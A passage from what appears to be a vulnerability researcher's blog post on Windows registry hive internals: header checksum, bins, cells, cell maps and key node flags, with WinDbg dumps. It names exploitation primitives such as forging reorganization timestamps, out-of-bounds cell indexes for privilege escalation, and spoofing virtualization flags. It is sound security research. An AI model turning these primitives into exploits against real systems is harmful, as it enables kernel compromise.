(in-memory hive data that gets erased on reboot), we get a total maximum size of around 4 GiB when both types of storage space are completely maxed out. Incidentally, that's the same range as a single 32-bit cell index can address.Flags There are currently only two supported hive flags: 0x1, which indicates whether there are any pending transactions involving the hive, and 0x2, which expresses whether the hive is differencing and contains layered keys or not. The latter flag is typically set when the hive version is 1.6.LastReorganizeTime In order to address the problem of accumulating fragmentation over time, Windows 8.1 introduced a new mechanism to both shrink and optimize hives during load called reorganization. It happens automatically if the last reorganization took place more than seven days ago and the fragmentation rate of the hive is greater than 1 MiB. Reorganization achieves its goals by starting off with an empty hive and copying all existing keys recursively, taking into account which ones have been used during boot, during system runtime, and not at all since the last reorganization. The end result is that the hive becomes more packed, thanks to the elimination of free cells taking up unnecessary space, and more efficient to operate on, because the "hot" keys are grouped closer together. As the name suggests, the LastReorganizeTime member stores the timestamp of the last time a successful reorganization took place. From an attacker's perspective, it can be adjusted to control the behavior of the internal CmpReorganizeHive function and deterministically trigger the reorganization or skip it, depending on the desired end result. In addition to indicating a timestamp, the LastReorganizeTime field may also be equal to one of two special marker values: 0x1 to have the hive unconditionally reorganized on the next load, and 0x2 to clear the access bits on all the keys in the hive, i.e. reset the key usage information that has been collected so far.CheckSum The CheckSum field at offset 0x1FC stores the checksum of the first 508 bytes of the header (i.e. all data prior to this field), and is simply a 32-bit XOR of the header data treated as a series of 127 consecutive DWORDs. If the computed value is equal to 0xFFFFFFFF (-1), then the checksum is set to 0xFFFFFFFE (-2), and if the computed value is 0x0, then the checksum is 0x1. This means that 0 (all bits clear) and -1 (all bits set) are never valid checksum values. If you wish to examine the kernel implementation of the algorithm, you can find it in the internal HvpHeaderCheckSum function. The checksum is particularly important when making changes to existing hives, either for experimentation or during fuzzing. If any data within the first 508 bytes of the file is modified, the checksum needs to be adjusted accordingly. Otherwise, the system will reject the file early in the loading process with the STATUS_REGISTRY_CORRUPT error code, and none of the deeper code paths will be exercised. Therefore, fixing up the checksum is the bare minimum a hive fuzzer should do to maximize its chances of success.Other fields There are several other pieces of information in the header that carry some value, more so in the context of digital forensics and incident response than strictly low-level system security. For example, "Signature" identifies the file as a regf hive and may make it easier to identify the format in raw memory/disk dumps, while "TimeStamp" indicates the last time the hive has been written to, which can be critical for establishing a timeline of events during an investigation. Furthermore, the Offline Registry Library (offreg.dll) leaves further traces in the generated hive files: a 4-byte "OfRg" identifier at offset 0xB0 (nominally the Reserved1 field) and a serialization timestamp at offset 0x200 (nominally Reserved2). For more information about the meaning and usefulness of each part of the header, please refer to one of the unofficial format specifications.Bins Bins in registry hives are a simple organizational concept used to split a potentially large hive into smaller chunks that can be mapped in memory independently of each other. Each of them starts with a 32-byte _HBIN structure: 0: kd> dt _HBIN nt!_HBIN    +0x000 Signature        : Uint4B    +0x004 FileOffset       : Uint4B    +0x008 Size             : Uint4B    +0x00c Reserved1        : [2] Uint4B    +0x014 TimeStamp        : _LARGE_INTEGER    +0x01c Spare            : Uint4B The four meaningful fields here are the four-byte signature ("hbin"), offset of the bin in the file, size of the bin, and a timestamp. Among them, the signature is a constant, the file size is sanitized early in the hive process and effectively also a constant, and the timestamp is not security-relevant. This leaves us with the size as the most interesting part of the header. The only constraints for it is that it must be a multiple of 0x1000, and the sum of the offset and size must not exceed the total length of the hive (_HBASE_BLOCK.Length). At runtime, bins are allocated as the smallest 4 KiB-aligned regions that fit a cell of the requested size, so in practice, they typically end up being between 4-16 KiB in size, but they may organically be as long as 1 MiB. While longer bins cannot be produced by the Windows kernel, there is nothing preventing a specially crafted hive from being loaded in the system with a bin of ~2 GiB in size, the maximum length of a hive as a whole. This behavior doesn't seem to have any direct security implications, but more generally, it is a great example of how the hive states written by Windows are a strictly smaller subset of the set of states accepted as valid during loading: Cells Cells are the smallest unit of data in registry hives – they're continuous buffers of arbitrary lengths. They do not have a dedicated header structure like _HBASE_BLOCK or _HBIN, but instead, each cell simply consists of a signed 32-bit size marker followed by the cell's data. The size field is subject to the following constraints: A cell may be in one of two states – allocated and free – as indicated by the sign of the size value. Positive values are used for free cells, and negative ones for allocated cells.The size value accounts for the four bytes occupied by itself.The size value must be a multiple of 8 (i.e. have its three lowest bits set to zero). If a cell with size non-divisible by 8 is allocated at runtime, it is aligned up to the next multiple of 8, potentially leading to some unused padding bytes at the end of the cell.The sum of all consecutive cells in a bin must be equal to the length of the bin. In other words, the bin header followed by tightly packed cells (with no gaps) completely fill the bin space. If the hive loader detects that this is not the case, it forcefully fixes it by creating a single free cell spanning from the failing point up to the end of the bin. This invariant must subsequently hold for the entire time the hive is loaded in the system. If cells remind you of heap allocations requested via malloc or HeapAlloc, it is not just your impression. There are many parallels to be drawn between hive cells and heap buffers: both can be allocated and freed, have arbitrary sizes and store a mixture of well-formatted structures and free-form user data. However, there are some significant differences too: heap implementations have evolved to include anti-exploitation mitigations like layout randomization, heap cookies for metadata protection, double-free detection and miscellaneous other consistency checks. On the other hand, hives have none of that: the allocation logic is fully deterministic and doesn't involve any randomness, there is no metadata protection, and generally little to no runtime checks. This is likely caused by the fact that heap chunks have been targets of memory corruption for many decades, whereas the registry was designed with the assumption that once loaded, the hive structure is always internally consistent and intra-hive memory corruption may never occur. This makes the exploitation of certain registry bugs particularly convenient and reliable, as I will demonstrate in future blog posts. Like a typical memory allocator interface, cells have alloc, realloc, and free functions. Specifically, the internal routines responsible for these tasks in the Windows kernel are HvAllocateCell, HvReallocateCell and HvFreeCell, and reverse-engineering them allowed me to uncover some helpful insights. For instance, I have found that HvAllocateCell and HvReallocateCell reject allocation sizes larger than 1 MiB, and for requests above 16 KiB, they round the size up to the next power of two. Meanwhile, HvFreeCell performs coalescing of free cells, so there should never be two adjacent free cells in an organically created hive. These are some further examples of behavior that is guaranteed on output, but not enforced on input. This is a prevalent pattern in the Windows registry, and I found it useful to keep track of such primitives in my research, even if they didn't seem particularly useful at the time. Thanks to this, I have discovered at least three security bugs closely related to this phenomenon, including one in the interactions between HvReallocateCell and its callers (CVE-2022-37988).Cell indexes If we equate cells to heap buffers in user-mode applications, then cell indexes would be pointers. Cells rely on these indexes to interrelate within the registry's complex structure. For example, keys reference security descriptors (to control access), their parent key (to navigate the hierarchy), and optionally the list of subkeys and list of values (to organize data). The list of values references specific value records, which in turn reference the actual data backing cells, and so on. This intricate web of relationships is no different from any semi-complex object in a C/C++ program, where pointers link various data structures. On disk, cell indexes are nothing special: they are simply 32-bit offsets from the start of the hive data (after the 0x1000 byte header), which is a typical way of implementing cross-object references in most file formats. However, it's important to note that a cell index must point to the beginning of a cell (not inside it or in the bin header), and the cell must be in the allocated state – otherwise, the index is considered invalid. So when implementing a read-only regf parser operating on the hive as a contiguous memory block, translating cell indexes is as simple as adding them to the starting address of the hive in memory. When a hive is loaded in Windows, the management of cell indexes becomes more complex. Hives at rest have a maximum size of 2 GiB, and all of their data is considered stable (persistently stored). On the other hand, an active hive also gains an additional 2 GiB of volatile storage, used for temporary keys and values that reside only in memory. These temporary entries exist only while the hive is loaded (or until the system is shut down) and can be created by calling RegCreateKeyEx with the REG_OPTION_VOLATILE flag, which designates the key as temporary. To distinguish between these two storage spaces in a cell index, the highest bit serves as an indicator: 0x0 for stable space and 0x1 for the volatile one, resulting in large index values (greater than 0x80000000) that readily identify volatile cells. But an even bigger complication stems from the fact that hives can shrink and grow at runtime, so it is largely impractical to have them mapped as a single block of memory. To efficiently handle modifications to the registry, Windows maps hives in smaller chunks, which makes the previous method of translating cell indexes obsolete, and necessitates a more sophisticated solution. The answer to the problem are cell maps – pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers, indexed by the respective 1, 10, 9, and 12-bit parts of the 32-bit cell index. Cell maps in the Windows kernel utilize a hierarchical structure consisting of storage arrays, directories, tables, and leaf entries, all defined within the ntoskrnl.exe PDB symbols (the relevant structures are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY). The layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry: Cell indexes play a central role in core registry operations, such as creating, reading, updating, and deleting keys and values. The internal kernel function responsible for traversing the cell map and translating cell indexes into virtual addresses is HvpGetCellPaged. In normal conditions, the indexes stay within the bounds of the storage space size (_HHIVE.Storage[x].Length), so HvpGetCellPaged assumes their validity and doesn't perform any additional bounds checking. However, certain memory corruption vulnerabilities may allow attackers to manipulate these cell indexes at runtime. Crucially, I discovered that out-of-bounds cell indexes can serve as a powerful primitive for exploit development, enabling the construction of proof-of-concept exploits that achieve local elevation of privileges. I will elaborate further on this in future exploit-focused blog posts. As a last note, the special marker of -1 (0xFFFFFFFF) is used to represent non-existent cells, and can be found in cell indexes pointing at optional data that doesn't exist – basically a hive equivalent of a NULL pointer. The internal name for the constant in the Windows kernel is HCELL_NIL, and under normal circumstances, it should never be passed directly to HvpGetCellPaged. Doing so without guaranteeing that the cell index is valid first would constitute a bug in the Windows kernel (for example, see CVE-2023-35357 or CVE-2023-35358).Cell types Now that we have familiarized ourselves with the low-level structure of hives that facilitates their efficient management in memory, let's go a little further and learn about the types of information stored in the cells. These are the objects that actually define the registry tree and all of its properties: keys, values, security descriptors, etc. The first subsection provides a general overview of the various cell types found within a hive and the relations between them. The second one goes into the intricate details of their format and usage within the Windows kernel, uncovering obscure implementation details rarely documented elsewhere.Overview of cell types Registry hives utilize only seven distinct cell types to represent the various data structures within the registry, as outlined below: Key Node: Represents a single registry key and its associated metadata. It is defined by the _CM_KEY_NODE structure and contains references to other cells, including its parent key, security descriptor, class data (optional), and lists of subkeys (stable and volatile) and values (optional).Subkey Index: A variable-length list of key node cell indexes, representing the subkeys of a specific key. For performance reasons, there are four variations of subkey indexes: index leaf, fast leaf, hash leaf, and root index. All are represented by the _CM_KEY_INDEX structure.Security Descriptor: Defines access control information for one or more keys, specifically a security descriptor in a self-relative format. Represented by the _CM_KEY_SECURITY structure, it is the only cell type that can be referenced from multiple key nodes and is therefore reference-counted. It also contains links to the next and previous security descriptors in the hive.Key Value: Defines a single value associated with a key, including its name, type, data length, and a reference to the cell containing the actual data. It is represented by the _CM_KEY_VALUE structure.Big Data: Used to store value data exceeding 16,344 bytes (~16 KiB) in hive versions 1.4 and later. The data is divided into chunks of up to 16 KiB each, allowing for values approaching 1 GiB. The _CM_BIG_DATA structure represents this cell type, containing the number of chunks and a reference to the list of chunk cells.Value List and Chunk List Cells: These cells are simple arrays of 32-bit cell indexes. They are used to store lists of values associated with a key and lists of chunks for large value data.Data Cells: These cells store the raw data associated with keys and values. They hold the optional class data for a key, the complete data for small values (up to 1 MiB in older hives, ~16 KiB in newer hives), and the individual chunks of large values. The diagram below illustrates the relationships between these cell types: Deep dive into each cell type Now that we know the general purpose of each cell type, it's a good time to dig a little deeper into each of them. This lets us explore both their implementation details, as well as the spirit behind these objects and how they interact with each other in a real-life environment. I have tried my best to avoid repeating the existing unofficial specifications and instead only focus on the security-relevant and sparsely documented aspects of the format, but if any redundant information makes it into this section, please bear with me. 🙂Key nodes As keys are the most important part of the registry, key nodes are the most important and complex of all cell types. When dumped in WinDbg, the layout of the _CM_KEY_NODE structure is as follows: 0: kd> dt _CM_KEY_NODE /r nt!_CM_KEY_NODE    +0x000 Signature        : Uint2B    +0x002 Flags            : Uint2B    +0x004 LastWriteTime    : _LARGE_INTEGER    +0x00c AccessBits       : UChar    +0x00d LayerSemantics   : Pos 0, 2 Bits    +0x00d Spare1           : Pos 2, 5 Bits    +0x00d InheritClass     : Pos 7, 1 Bit    +0x00e Spare2           : Uint2B    +0x010 Parent           : Uint4B    +0x014 SubKeyCounts     : [2] Uint4B    +0x01c SubKeyLists      : [2] Uint4B    +0x024 ValueList        : _CHILD_LIST       +0x000 Count            : Uint4B       +0x004 List             : Uint4B    +0x01c ChildHiveReference : _CM_KEY_REFERENCE       +0x000 KeyCell          : Uint4B       +0x008 KeyHive          : Ptr64 _HHIVE    +0x02c Security         : Uint4B    +0x030 Class            : Uint4B    +0x034 MaxNameLen       : Pos 0, 16 Bits    +0x034 UserFlags        : Pos 16, 4 Bits    +0x034 VirtControlFlags : Pos 20, 4 Bits    +0x034 Debug            : Pos 24, 8 Bits    +0x038 MaxClassLen      : Uint4B    +0x03c MaxValueNameLen  : Uint4B    +0x040 MaxValueDataLen  : Uint4B    +0x044 WorkVar          : Uint4B    +0x048 NameLength       : Uint2B    +0x04a ClassLength      : Uint2B    +0x04c Name             : [1] Wchar In the following subsections, each member is discussed in more detail.Signature This field always stores the special value 0x6B6E, which translates to 'nk' when written in little-endian. It exists for informational purposes only, and isn't used for anything meaningful in the code after the initial sanitization during load.Flags This is a highly interesting and security-relevant field, as it indicates the role of the key in the hive, and clarifies how certain parts of the key node are formatted. The present and historical flags are presented in the table below together with their names and descriptions: Mask Name Description 0x0001 KEY_VOLATILE (Deprecated) The flag used to indicate that the key and all its subkeys were volatile, but it is obsolete now and hasn't been used in several decades. Information about the key stable/volatile state can be inferred from the highest bit of the key's cell index. 0x0002 KEY_HIVE_EXIT Indicates that the key is the mount point of another registry hive. These special mount points are used to facilitate attaching new registry hives to the global registry view starting at \Registry in a live system. Exit nodes only ever exist in memory, so hives on disk mustn't have the flag set. More on the subject of mount points and exit nodes can be found in the next section, "Link nodes". 0x0004 KEY_HIVE_ENTRY Indicates that the given key is the entry to a hive, or in other words, the root of a hive. The flag must be set on the root key of each hive, and mustn't be set on any other nested keys. A hive entry key cannot be a symbolic link (KEY_SYM_LINK mustn't be set). 0x0008 KEY_NO_DELETE Indicates that the key cannot be deleted: any attempt to do so will return the error code STATUS_CANNOT_DELETE. This flag is always set on hive exit and hive entry keys, but is not allowed for any other keys. 0x0010 KEY_SYM_LINK Indicates that the key is a symbolic link, which has been created by specifying the REG_OPTION_CREATE_LINK flag in the RegCreateKeyEx call. They are freely accessible and don't come with many restrictions: every key other than a hive exit/entry key can be a symbolic link. However, they are required to adhere to additional structural requirements: they may only contain up to one value, and that value must be of type REG_LINK (6), named "SymbolicLinkValue", and a maximum of 65534 bytes long (32767 wide characters). 0x0020 KEY_COMP_NAME Indicates that the name of the key consists of ASCII characters only, and thus it has been "compressed" to fit two 8-bit characters in each of the 16-bit wide characters of _CM_KEY_NODE.Name. This optimization aims to save storage space and memory, especially as a great majority of keys have simple, alphanumeric names. This flag can be set on virtually every key in the registry, and indeed, it is by far the most commonly used one. 0x0040 KEY_PREDEF_HANDLE (Deprecated) The flag used to indicate that the key was a "predefined-handle key", which was a special kind of a symbolic link. The name refers to Predefined Keys, a set of top-level keys such as HKLM or HKCU recognized by the Win32 API. Keys with the KEY_PREDEF_HANDLE flag set allowed the system to redirect certain keys to chosen 32-bit HKEY pseudo-handles, and were specifically introduced in Windows NT 3.5 in 1994 for the purpose of redirecting two system keys related to reading performance data through the registry:HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 → HKEY_PERFORMANCE_TEXTHKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\CurrentLanguage → HKEY_PERFORMANCE_NLSTEXT Contrary to regular symbolic links, predefined keys re-purposed parts of the key node structure (specifically the value list length) to store the link destination, instead of using higher-level features of the format (such as the "SymbolicLinkValue" which is otherwise a perfectly normal value associated with a key). Such a change in semantics required a significant amount of special handling of predefined keys, which were not supposed to be operated on other than being opened. This, in turn, led to a number of security vulnerabilities related to the feature. For a detailed case study of one of them, CVE-2023-35633, see my Windows Registry Deja Vu: The Return of Confused Deputies talk from CONFidence 2024. As recently as 2023, all keys other than hive roots could be predefined keys, provided that they had been manually crafted in a binary controlled hive, because there was otherwise no supported way to create them via API. As a consequence of my reports, the feature was deprecated completely in July 2023 for Windows 10 1607+ and 11, and in December 2023 for older systems. At the time of this writing, the only two predefined keys left in existence are the original "009" and "CurrentLanguage" ones, and all other such keys are transparently converted to normal keys during hive load. Furthermore, there are also three flags related to Registry Virtualization, which was introduced in Windows Vista and is supported up to and including Windows 11: Mask Name Description 0x0080 VirtualSource Indicates that the key has been subject to virtualization, i.e. that it has a counterpart in the virtual store subtree. It is typically set on keys inside HKLM\Software which have been attempted to be opened with write access by a program running as a non-administrator. 0x0100 VirtualTarget Indicates that the key is a virtual replica of a key in a global system hive that has been subject to virtualization. It is typically set on keys inside HKU\_Classes\VirtualStore that have been created as a result of virtualization. It can only be set if VirtualStore (0x200) is set on the key, too. 0x0200 VirtualStore Indicates that the key is part of the virtual store registry subtree, typically HKU\_Classes\VirtualStore and its subkeys. It means that new virtualization targets may be created inside the key, but it itself isn't necessarily a virtual key (unless the VirtualTarget flag is also set). As we can see, the purpose of these flags is to keep track of the virtualization state of each key. Given that they express the internal state of the key and are intended to be modified by the kernel only, there doesn't seem to be a good reason to allow user-mode clients to modify the flags on demand. But in practice, unprivileged users have a lot of control over them: programs may arbitrarily set them in hives loaded from disk that they control (app hives and the user hive), and they may also set and clear them at runtime with the NtSetInformationKey(KeySetVirtualizationInformation) system call, as long as they are granted KEY_SET_VALUE access to the key. This makes it effectively possible to "spoof" virtual source/target/store keys, and opens up all of the registry virtualization code for potential abuse by unprivileged users. This has led to the discovery of multiple bugs directly related to virtualization: CVE-2015-0073 and CVE-2019-0881 by James Forshaw, and several more as part of my recent research.LastWriteTime This is yet another timestamp, in this case tracked on a key-granularity level. I assume it may be an interesting artifact for purposes of digital forensics, but otherwise it doesn't seem particularly security-relevant. One thing of note is that this information is very easy to query at runtime, as it is returned by the RegQueryInfoKey API, and is also a part of the output structures of numerous key information classes that can be queried via the NtQueryKey system call.AccessBits While theoretically an 8-bit field, this is effectively a 2-bit bitmask introduced in Windows 8 as part of the hive reorganization logic described earlier. It tracks the system phase(s) in which the key has been accessed: 0x0 if not accessed at all, 0x1 if accessed during boot, and 0x2 if accessed during normal system operation. This information is then used during reorganization to allocate key nodes with similar access bits close together.LayerSemantics This member is a 2-bit enum, used exclusively in hive version 1.6, which corresponds to differencing hives (also known as delta hives). Differencing hives are closely related to containerization support, and their purpose is to be overlaid on another hive in the system rather than being mounted as a standalone hive. For this reason, every key in a differencing hive is in one of four states, which indicate how the key should be interpreted in relation to the keys below it (i.e. the corresponding keys in lower-layer hives). These four states are:Merge-Backed (0): the properties of the key are meant to be merged with the properties of the underlying keys in the key stack.Tombstone (1): the key is deleted at the current level, so none of the keys below it should be considered.Supersede-Local (2): the properties of the key fully supersede any state in the key stack below it: only values associated with that level (and any upper layers) are visible to the user.Supersede-Tree (3): same as Supersede-Local, but it applies to the key itself and recursively to all of its subkeys. There is also an additional, implicit state called Merge-Unbacked, used to describe keys that don't exist in a hive at a given level, and so they simply fall through to the state represented by keys in the lower layers. Overall, layer semantics play a crucial role in the functionality of layered keys and differencing hives, and their correct handling in the registry implementation is paramount to system security and stability. Unfortunately, the feature is too complex to thoroughly discuss here, but there are some excellent resources on the subject: Microsoft's Containerized Configuration (US20170279678A1) patent, Maxim Suhanov's Containerized registry hives in Windows blog post, and the "Registry virtualization" section in Chapter 10 of the Windows Internals 7 (Part 2) book.InheritClass This bit is also related to layered keys, and it indicates whether the key inherits the class value from its counterparts lower in the key stack, or defines its own (or lack thereof).Parent The field identifies the key node that acts as this key's parent within the registry's hierarchical structure. Except for root keys, which exist at the topmost level of a hive, every key must have a valid Parent field. This index plays a vital role in navigating the registry and modifying key relationships. For example, it's essential for determining a key's full path or ensuring correct alphabetical order when renaming a key within its parent's subkey list.SubKeyCounts This two-element array of DWORDs stores the number of the key's stable and volatile subkeys, respectively. Even though the integers are 32 bits wide, the actual number of subkeys is limited by the upper bound of all keys in a hive in a specific storage space, which is roughly 2 GiB (storage space size) ÷ 84 bytes (minimum key node size) ≈ 25.5 million keys. The data in this field is somewhat redundant, as the same information is also stored in the subkey indexes themselves. Nevertheless, the cached numbers stored directly in the key node make it possible to efficiently query the numbers of subkeys with API such as RegQueryInfoKey. The kernel does its best to keep the two copies of the information in sync, and any discrepancies between them may lead to memory corruption vulnerabilities.SubKeyLists This is another two-element array, which complements the previous SubKeyCounts member by providing cell indexes to the corresponding subkey lists for each storage type. The format of these lists is discussed in detail in the "Subkey indexes" section below; for now, it's only important to know that if SubKeyCounts[x] > 0, then SubKeyLists[x] is expected to be a valid cell index, otherwise it should be equal to HCELL_NIL (-1). Furthermore, because the volatile space is a strictly in-memory concept that doesn't exist on disk, newly loaded hives are always expected to have SubKeyCounts[1] set to 0 and SubKeyLists[1] set to HCELL_NIL.ValueList This is a structure of type _CHILD_LIST, which consists of two 32-bit integers: the number of values associated with the key, and a cell index of the actual value list. Here, there is no distinction between stable and volatile values: for any given key, the values always inherit the storage type of the key, so either all of them are stable, or all of them are volatile. Similarly to subkey lists, though, if ValueList.Count is 0, then ValueList.List must be HCELL_NIL. As mentioned earlier, this field also had a second meaning if the key was a predefined key: in that case, ValueList.Count contained an arbitrary value with the highest bit set, which indicated the top-level HKEY to redirect to, and ValueList.List was completely unused and could contain arbitrary data. As you can imagine, whenever an internal system function started to use such a value list with the assumption it was a normal key, it would operate on an inadequately huge count and an invalid cell index, wrecking havoc in the kernel. Thankfully, this is no longer a possibility due to the deprecation of predefined keys in 2023.ChildHiveReference You may have noticed that ChildHiveReference is part of a union, as it resides at the same offset as the SubKeyLists member (offset 0x1C). It is a special object that is used to implement hive mounting under the \Registry tree, and is unique to keys that have the KEY_HIVE_EXIT flag set (i.e. exit nodes). It is only ever used in memory, and is therefore not applicable to regular hives stored on disk. Its two fields specify the root key of the mounted hive, as a pair of a kernel pointer to the _HHIVE descriptor structure and the cell index of the root key. This breaks the fundamental invariant that hives are self contained and don't store any virtual address pointers, only cell indexes. It is the only exception to the rule, and only because it is a necessary hack/workaround to implement a feature that hives normally don't support: attaching one hive to another in the global system view. The field and its usage are discussed in more detail in the "Link nodes" section below.Security This is the cell index of the security descriptor cell corresponding to the key. It is a mandatory field for every type of key in the registry (symbolic links, previously predefined keys etc.), with the only exception being system-managed exit nodes. For every key that has an invalid security descriptor during hive load (e.g. set to HCELL_NIL or just an invalid cell index), it is automatically fixed up to inherit the security descriptor of its parent key. If the root key of a hive has invalid security, the whole hive is rejected with the STATUS_REGISTRY_CORRUPT error code. The security descriptor cell always has the same storage type as the key(s) that it is associated with. So for example, if there are two keys in a hive with the same security properties, one in the stable and the other in the volatile space, then they will reference two different stable/volatile security cells with equivalent data. For obvious reasons, the correct handling of this field is crucial to overall system security. In the course of my research, I have discovered 9 vulnerabilities directly involving the handling of security descriptors, and a further 4 reported to Microsoft outside of the tracker (WinRegLowSeverityBugs #1, #10, #13, #20). They generally didn't have much to do with the  _CM_KEY_NODE.Security field specifically, but rather the formatting of the security cells and higher-level logic related to them:Binary formatting of the SECURITY_DESCRIPTOR_RELATIVE structureMaintaining the consistency of the doubly-linked list of security descriptors in the hiveReference counting security descriptors when operating on keysEnforcing proper access checks when opening and creating keys Overall, this is probably the most interesting field in the structure from a security research perspective.Class and ClassLength In technical terms, a key class is an optional, immutable blob of 1-65535 bytes associated with a key. It can only be set once, during the creation of a key, through the lpClass argument of the RegCreateKeyExW API (or the equivalent Class parameter of the NtCreateKey system call). It can be then queried with functions such as RegQueryInfoKey, but cannot be modified without deleting and re-creating the key. If the class exists, then the ClassLength field is set accordingly, and Class is a cell index that points to its backing buffer. Otherwise, ClassLength is set to 0 and Class is HCELL_NIL (-1). Conceptually, a class can be viewed as an extra, hidden value of a key, existing alongside the normal value list. It is not displayed anywhere in the Regedit GUI, but if it exists for a given key, it can be retrieved by using the "Export" option in Regedit to save the key to a .txt file, which also exports the class data. It has existed since the earliest version 1.0 of the regf format – perhaps as a way to store the "type" of a key similar to how every value has a defined type. Today, it seems to be a mostly obsolete mechanism that doesn't see much use; even Raymond Chen wrote in his What is the terminology for describing the various parts of the registry? blog in 2009: Bonus chatter: There’s also this thing called a class. I have no idea what it’s for, so don’t ask. When I ran a quick scan of the Windows 11 registry, I found the following unique strings being used at least once as a key class: "DynDRootClass""GenericClass""Network ComputerName""REG_SZ""Shell" The Windows NT Registry File (REGF) format specification lists several other values that have been observed in the past, such as "activeds.dll ", "Cygwin", "OS2SS" or "TCPMon". It is worth noting that the class was also used to store the encryption keys for the now-deprecated SAM database encryption mechanism known as SysKey. Overall, due to its simplistic nature, key classes are not particularly security-relevant, but may be of interest in the context of obfuscation and hiding data, as they are easily accessible and yet a largely overlooked part of the registry.MaxNameLen, MaxClassLen, MaxValueNameLen and MaxValueDataLen These four fields store cached information about the maximum lengths of several properties of the key or its subkeys: MaxNameLen: the maximum length of a subkey's name,MaxClassLen: the maximum length of a subkey's class information,MaxValueNameLen: the maximum length of a value name associated with the key,MaxValueDataLen: the maximum length of a value data associated with the key. The presumed purpose of these members is to facilitate a quick lookup of the per-key limits, such that when a client application wants to enumerate/query subkeys or values, it can simply allocate a single buffer guaranteed to accommodate every possible key name, value name, etc. And so, their exact values can be retrieved with the RegQueryInfoKey API via the lpcbMaxSubKeyLen, lpcbMaxClassLen, lpcbMaxValueNameLen and lpcbMaxValueLen arguments. Although querying these limits seems convenient, there are some caveats that are important to keep in mind: The fields are intended to represent the lower bound of the number of bytes required to store the given property, but not necessarily to be optimal (i.e. to be the smallest sufficient length). For example, when a key with formerly the longest name is deleted, the MaxNameLen field of the parent is not updated with the value of the second-largest length, as that would require the lengthy process of iterating through all of the subkeys again. Therefore, relying on those values may incur some unwanted memory overhead.When operating on registry keys that are globally visible in the registry tree, it is possible that a race condition with another application causes one of the maxima to change in between the RegQueryInfoKey call and the actual data query. To address this, applications should include fallback logic to allocate more memory in the rare case when the obtained maximum proves insufficient.To add to the previous point, after having reverse-engineered and reviewed most of the Configuration Manager code, it is my instinct that these fields continue to be supported throughout the development of new registry features (e.g. differencing hives), but it is mostly on a best-effort basis. For example, during hive load, only MaxValueNameLen and MaxValueDataLen are enforced to have the correct values, while MaxNameLen and MaxClassLen remain unchecked. For this reason, I would personally not rely on the consistency of those values for the security of any client code, and would treat them more as a guidance/supplementary information than the sole source of truth about the key limits.UserFlags This is a field whose name, offset and function (so basically every aspect) has been subject to change over the years. Its current form has existed since Windows Vista, and occupies bits 20-23 of MaxNameLen, which had been previously a 32-bit integer, but was later reduced to 16 bits to make room for these extra flags. In theory, its name may suggest that this member is meant to store user-defined data, but in practice, Microsoft developers quickly found their own use for the bitmask: storing flags related to the Registry Reflection mechanism for providing interoperability between 32-bit and 64-bit applications. You can read more about the meaning of each specific flag here, but in short, this was where reflection-specific configuration was internally saved by API functions such as RegEnableReflectionKey and RegDisableReflectionKey, and retrieved by RegQueryReflectionKey. However, this specific use seems to have been short-lived, as Registry Reflection was soon deprecated in Windows 7. Since then, it could indeed be considered as four extra bits of user-controlled storage per key, accessible for reading via NtQueryKey(KeyFlagsInformation) and for writing via NtSetInformationKey(KeyWow64FlagsInformation). Beyond being interesting for historical reasons, the field doesn't play any important role in security.VirtControlFlags This field is another one introduced around Windows XP SP3 / Windows Vista that took over some of the space from MaxNameLen. It is related to Registry Virtualization and takes up four bits in the _CM_KEY_NODE structure definition, but there are only three flags that it can really store: Mask Name Description 0x1 REG_KEY_DONT_VIRTUALIZE Disables virtualization for the specific key. 0x2 REG_KEY_DONT_SILENT_FAIL Prevents the system from re-opening a virtualized key with MAXIMUM_ACCESS if the initial Open operation with the desired access rights has failed. 0x4 REG_KEY_RECURSE_FLAG Causes new subkeys of the key to inherit its virtualization-related configuration. The flags are not sanitized in any way during hive load and so may be set to arbitrary values. They can also be modified programmatically by using the NtSetInformationKey(KeyControlFlagsInformation) system call, or even from the Windows command line, by using the REG FLAGS command: C:\>reg flags /? REG FLAGS KeyName [QUERY |                    SET [DONT_VIRTUALIZE] [DONT_SILENT_FAIL] [RECURSE_FLAG]]                   [/reg:32 | /reg:64]   Keyname    "HKLM\Software"[\SubKey] (Restricted to these keys on         local machine only).     SubKey   The full name of a registry key under HKLM\Software.   DONT_VIRTUALIZE DONT_SILENT_FAIL RECURSE_FLAG     Used with SET; flags specified on the command line will be set,         while those not specified will be cleared.   /reg:32  Specifies the key should be accessed using the 32-bit registry view.   /reg:64  Specifies the key should be accessed using the 64-bit registry view. More information about these flags can be found in the documentation of the ORSetVirtualFlags API function, a part of the Offline Registry Library. In the context of registry security research, I haven't found them particularly interesting – the other virtualization-related flags in the "Flags" field have proved to be much more useful in that regard.Debug In Debug/Checked builds of Windows, it used to be possible to have the kernel trigger a breakpoint when performing a specific operation on a specific registry key. To enable the option, an administrator would have to set the  HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager\RegDebugBreaksEnabled value to 1, which would propagate to the global kernel CmpRegDebugBreakEnabled variable. Then, the "Debug" field of each key would store a bitmask indicating which subset of eight possible operations should be interrupted for the given key: Mask Name 0x01 BREAK_ON_OPEN 0x02 BREAK_ON_DELETE 0x04 BREAK_ON_SECURITY_CHANGE 0x08 BREAK_ON_CREATE_SUBKEY 0x10 BREAK_ON_DELETE_SUBKEY 0x20 BREAK_ON_SET_VALUE 0x40 BREAK_ON_DELETE_VALUE 0x80 BREAK_ON_KEY_VIRTUALIZE Whenever a breakpoint was triggered by this mechanism, the kernel would also print out a corresponding message for the attached debugger, for instance: DbgPrint("\n\n Current process is deleting a key tagged as BREAK ON DELETE"); DbgPrint(" or deleting a subkey under a key tagged as BREAK_ON_DELETE_SUBKEY\n"); DbgPrint("\nPlease type the following in the debugger window: !reg kcb %p\n\n\n", Kcb); Now that the Debug/Checked builds have been discontinued – or at least not released publicly anymore for the latest versions of Windows 10/11 – the "Debug" field is just an unused byte in the key node structure.WorkVar According to an unofficial format specification, WorkVar used to be an internal-use member meant to be only ever accessed by the kernel in order to optimize key lookups. The last version of Windows where WorkVar was still in active use was Windows 2000; since Windows XP, it has simply been another four bytes of unused memory in the key node data layout.NameLength and Name The combination of these two fields specifies the name of the key: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer at the end of the structure that stores the name itself. There are a number of considerations and 